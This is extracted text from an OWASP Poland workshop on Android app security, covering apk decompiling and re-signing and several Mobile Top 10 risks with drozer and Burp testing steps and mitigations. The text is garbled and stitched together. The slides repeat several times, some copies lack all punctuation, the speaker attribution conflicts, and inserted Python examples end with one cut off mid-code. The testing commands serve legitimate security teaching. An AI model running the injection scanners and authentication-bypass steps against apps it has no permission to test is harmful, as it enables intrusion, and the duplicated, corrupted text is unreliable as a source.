id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a newly started activity, etc.) via special objects called Intents
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
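The drozer commands above answer "which components can another app reach?" on a live device. As an added example written for this page (not a workshop tool), the same question answered offline from the AndroidManifest.xml that apktool decodes, applying the platform's export defaults; the manifest and the com.example.vulnapp package are constructed.

```python
"""Added example: list the components of an apk that other apps can reach,
from a decoded AndroidManifest.xml. The sample manifest is constructed."""
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "service", "receiver", "provider")
LAUNCHER = "android.intent.category.LAUNCHER"

SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.vulnapp">
  <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="23"/>
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminPanelActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <service android:name=".SyncService" android:permission="com.example.vulnapp.SYNC">
      <intent-filter><action android:name="com.example.vulnapp.SYNC_NOW"/></intent-filter>
    </service>
    <provider android:name=".NotesProvider" android:authorities="com.example.vulnapp.notes"/>
  </application>
</manifest>
"""


def _attr(elem, name, default=None):
    return elem.get(ANDROID + name, default)


def is_exported(component, min_sdk: int) -> bool:
    """Platform defaults: an explicit android:exported wins; otherwise any
    component with an <intent-filter> is exported, and a <provider> is
    exported by default on minSdkVersion < 17 even without one."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.find("intent-filter") is not None:
        return True
    return component.tag == "provider" and min_sdk < 17


def exported_components(manifest_xml: str) -> list[dict]:
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    min_sdk = int(_attr(sdk, "minSdkVersion", "1")) if sdk is not None else 1
    found = []
    for comp in root.find("application"):
        if comp.tag not in COMPONENTS or not is_exported(comp, min_sdk):
            continue
        filters = comp.findall("intent-filter")
        perm = _attr(comp, "permission")
        if comp.tag == "provider":   # providers may be guarded per direction instead
            perm = perm or _attr(comp, "readPermission") or _attr(comp, "writePermission")
        found.append({
            "type": comp.tag,
            "name": _attr(comp, "name"),
            "permission": perm,
            "actions": [_attr(a, "name") for f in filters for a in f.findall("action")],
            "launcher": any(_attr(c, "name") == LAUNCHER
                            for f in filters for c in f.findall("category")),
        })
    return found


def unprotected(manifest_xml: str) -> list[str]:
    """Exported components any app may call without holding a permission;
    the launcher activity is exported by design and is left out."""
    return [f"{c['type']}:{c['name']}" for c in exported_components(manifest_xml)
            if c["permission"] is None and not c["launcher"]]


def is_debuggable(manifest_xml: str) -> bool:
    root = ET.fromstring(manifest_xml)
    return _attr(root.find("application"), "debuggable", "false").lower() == "true"


if __name__ == "__main__":
    for c in exported_components(SAMPLE_MANIFEST):
        print(f"{c['type']:8} {c['name']:20} perm={c['permission']} actions={c['actions']}")
    print("callable without a permission:", unprotected(SAMPLE_MANIFEST))
    print("debuggable:", is_debuggable(SAMPLE_MANIFEST))
```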
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows for remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and verify:
  – whether a session expires (copy a cookie and try to use it after 30 minutes)
  – whether a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
  – whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
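As an added example (not from the workshop), the "can it be guessed" and "high entropy" bullets turned into a check run on session tokens captured through the proxy: keyspace estimate from length and alphabet, detection of sequential values across logins, and detection of tokens shaped like an Android ID or IMEI. All token sets below are constructed.

```python
"""Added example: rate captured session tokens against the M9 criteria.
Token sets are constructed; one value per login of the same account."""
import math
import re

ANDROID_ID = re.compile(r"^[0-9a-f]{16}$")   # shape of Settings.Secure.ANDROID_ID
IMEI = re.compile(r"^\d{15}$")               # shape of an IMEI

WEAK_SEQUENTIAL = ["100041", "100042", "100043"]
DEVICE_ID_TOKEN = ["3f2a9c1d7b6e4a50"]       # the same value comes back on every login
STRONG_RANDOM = [
    "7c9e0f3a5b1d2e4f6a8b0c1d2e3f4a5b",
    "0a1b2c3d4e5f60718293a4b5c6d7e8f9",
    "ffeeddccbbaa99887766554433221100",
]


def alphabet_size(tokens: list[str]) -> int:
    """Size of the character set the generator appears to draw from."""
    joined = "".join(tokens)
    if re.fullmatch(r"[0-9]+", joined):
        return 10
    if re.fullmatch(r"[0-9a-f]+", joined) or re.fullmatch(r"[0-9A-F]+", joined):
        return 16
    size = 0
    for cls, n in ((r"[0-9]", 10), (r"[a-z]", 26), (r"[A-Z]", 26)):
        if re.search(cls, joined):
            size += n
    return size + len({ch for ch in joined if not ch.isalnum()})


def _as_int(token: str):
    """Numeric value of a decimal or hex token, None if it is neither."""
    for base in (10, 16):
        try:
            return int(token, base)
        except ValueError:
            pass
    return None


def analyse_tokens(tokens: list[str]) -> dict:
    values = [_as_int(t) for t in tokens]
    # Consecutive logins yielding nearby numbers means the next token is guessable.
    sequential = (len(tokens) >= 2 and None not in values
                  and all(0 < b - a < 1000 for a, b in zip(values, values[1:])))
    min_len = min(len(t) for t in tokens)
    bits = min_len * math.log2(alphabet_size(tokens))   # upper bound on keyspace
    device_id = any(ANDROID_ID.match(t) or IMEI.match(t) for t in tokens)
    problems = []
    if bits < 64:
        problems.append(f"only ~{bits:.0f} bits of keyspace")
    if sequential:
        problems.append("tokens are sequential")
    if device_id:
        problems.append("token has the shape of a device identifier")
    return {"min_length": min_len, "estimated_bits": bits, "sequential": sequential,
            "looks_like_device_id": device_id, "problems": problems,
            "verdict": "weak" if problems else "ok"}


if __name__ == "__main__":
    for name, toks in (("sequential", WEAK_SEQUENTIAL),
                       ("device id", DEVICE_ID_TOKEN),
                       ("random", STRONG_RANDOM)):
        r = analyse_tokens(toks)
        print(f"{name:10} {r['verdict']:4} {r['estimated_bits']:6.1f} bits {r['problems']}")
```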
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High level – Java code
• Disassembling
  – Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Certificate inspection in web applications – chain of trust
• In web applications the validation of a certificate is done on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X509 certificate or public key is embedded in the source code
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about a developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/Paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
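An added example, not part of the slides: a filter for the `adb logcat` output of the step above that reports the kinds of values which must never end up in logs or crash logs (credentials, bearer tokens, e-mail addresses, GPS coordinates, card numbers validated with Luhn). The log lines are constructed, in logcat's default brief format, and the pid filter keeps only the app under test.

```python
"""Added example: spot sensitive values in 'adb logcat' output.
The capture below is constructed; pid 4321 is the app under test."""
import re
from dataclasses import dataclass
from typing import Optional

LOGCAT_LINE = re.compile(
    r"^(?P<level>[VDIWEF])/(?P<tag>[^(]+?)\s*\(\s*(?P<pid>\d+)\):\s?(?P<msg>.*)$")

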